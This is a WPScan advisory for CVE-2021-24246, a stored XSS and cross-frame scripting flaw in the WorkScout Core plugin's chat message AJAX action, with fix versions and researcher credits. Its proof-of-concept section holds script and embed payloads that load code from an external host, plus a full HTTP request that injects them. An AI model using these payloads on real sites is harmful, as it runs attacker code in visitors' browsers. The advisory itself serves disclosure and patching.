WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS

Description

The plugin, used by the WorkScout Theme did not sanitise the chat messages sent via the workscout_send_message_chat AJAX action, leading to Stored Cross-Site Scripting and Cross-Frame Scripting issues

Proof of Concept

Payloads:
<!-->"><script src=https://m0ze.ru/payload/a.js></script>
<!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>


POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://workscout.in/messages/?action=view&conv_id=163
Cookie: [user cookies]

action=workscout_send_message_chat&recipient=3&conversation_id=163&message=%3C!--%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3C!--%3E%3Cembed%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E

Affects Plugins

workscout-core
Fixed in version 1.3.4

Affects Themes

workscout
Fixed in version 2.0.33

References

CVE
CVE-2021-24246
URL
https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-WorkScout-WordPress-Theme-v2.0.33.txt

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

Yes

WPVDB ID
2365a9d0-f6f4-4602-9804-5af23d0cb11d

Timeline

Publicly Published

2021-04-08 (about 1 years ago)

Added

2021-04-08 (about 1 years ago)

Last Updated

2021-04-09 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin